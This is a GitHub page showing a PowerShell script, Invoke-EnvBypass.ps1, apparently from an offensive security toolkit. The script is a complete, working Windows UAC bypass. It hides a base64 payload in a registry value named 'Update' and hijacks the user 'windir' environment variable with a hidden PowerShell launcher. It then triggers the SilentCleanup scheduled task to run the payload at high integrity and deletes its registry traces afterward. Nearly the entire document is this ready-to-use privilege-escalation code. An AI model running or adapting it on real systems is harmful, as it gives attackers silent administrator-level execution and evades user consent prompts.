This repository has been archived by the owner on Jan 29, 2020. It is now read-only.
-
Notifications
You must be signed in to change notification settings - Fork 2.8k
/
Invoke-EnvBypass.ps1
98 lines (77 loc) · 4.12 KB
/
Invoke-EnvBypass.ps1
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
function Invoke-EnvBypass {
<#
.SYNOPSIS
Bypasses UAC (even with Always Notify level set) by performing an registry modification of the "windir" value in "Environment" based on James Forshaw findings (https://tyranidslair.blogspot.cz/2017/05/exploiting-environment-variables-in.html)
Only tested on Windows 10
Author: Petr Medonos (@PetrMedonos)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
.PARAMETER Command
Specifies the base64 encoded command you want to run in a high-integrity context.
.EXAMPLE
Invoke-EnvBypass -Command "IgBJAHMAIABFAGwAZQB2AGEAdABlAGQAOgAgACQAKAAoAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAFAAcgBpAG4AYwBpAHAAYQBsAF0AWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMASQBkAGUAbgB0AGkAdAB5AF0AOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAKAApACkALgBJAHMASQBuAFIAbwBsAGUAKABbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBCAHUAaQBsAHQASQBuAFIAbwBsAGUAXQAnAEEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAJwApACkAIAAtACAAJAAoAEcAZQB0AC0ARABhAHQAZQApACIAIAB8ACAATwB1AHQALQBGAGkAbABlACAAQwA6AFwAVQBBAEMAQgB5AHAAYQBzAHMAVABlAHMAdAAuAHQAeAB0ACAALQBBAHAAcABlAG4AZAA="
This will write out "Is Elevated: True" to C:\UACBypassTest.
#>
[CmdletBinding(SupportsShouldProcess = $True, ConfirmImpact = 'Medium')]
Param (
[Parameter(Mandatory = $True)]
[ValidateNotNullOrEmpty()]
[String]
$Command,
[Switch]
$Force
)
$ConsentPrompt = (Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System).ConsentPromptBehaviorAdmin
$SecureDesktopPrompt = (Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System).PromptOnSecureDesktop
if(($(whoami /groups) -like "*S-1-5-32-544*").length -eq 0) {
"[!] Current user not a local administrator!"
Throw ("Current user not a local administrator!")
}
if (($(whoami /groups) -like "*S-1-16-8192*").length -eq 0) {
"[!] Not in a medium integrity process!"
Throw ("Not in a medium integrity process!")
}
#Begin Execution
#Store the payload
$RegPath = 'HKCU:Software\Microsoft\Windows\Update'
$parts = $RegPath.split('\');
$path = $RegPath.split("\")[0..($parts.count -2)] -join '\';
$name = $parts[-1];
$null = Set-ItemProperty -Force -Path $path -Name $name -Value $Command;
$envCommandPath = "HKCU:\Environment"
$launcherCommand = $pshome + '\' + 'powershell.exe -NoP -NonI -w Hidden -c $x=$((gp HKCU:Software\Microsoft\Windows Update).Update); powershell -NoP -NonI -w Hidden -enc $x; Start-Sleep -Seconds 1'
if ($Force -or ((Get-ItemProperty -Path $envCommandPath -Name 'windir' -ErrorAction SilentlyContinue) -eq $null)){
New-Item $envCommandPath -Force |
New-ItemProperty -Name 'windir' -Value $launcherCommand -PropertyType string -Force | Out-Null
}else{
Write-Warning "Key already exists, consider using -Force"
exit
}
if (Test-Path $envCommandPath) {
Write-Verbose "Created registry entries to change windir"
}else{
Write-Warning "Failed to create registry key, exiting"
exit
}
$schtasksPath = Join-Path -Path ([Environment]::GetFolderPath('System')) -ChildPath 'schtasks.exe'
if ($PSCmdlet.ShouldProcess($schtasksPath, 'Start process')) {
$Process = Start-Process -FilePath $schtasksPath -ArgumentList '/Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I' -PassThru -WindowStyle Hidden
Write-Verbose "Started schtasks.exe"
}
#Sleep 5 seconds
Write-Verbose "Sleeping 5 seconds to trigger payload"
if (-not $PSBoundParameters['WhatIf']) {
Start-Sleep -Seconds 5
}
$envfilePath = "HKCU:\Environment"
$envfileKey = "windir"
$PayloadPath = 'HKCU:Software\Microsoft\Windows'
$PayloadKey = "Update"
if (Test-Path $envfilePath) {
#Remove the registry entry
Remove-ItemProperty -Force -Path $envfilePath -Name $envfileKey
Remove-ItemProperty -Force -Path $PayloadPath -Name $PayloadKey
Write-Verbose "Removed registry entries"
}
}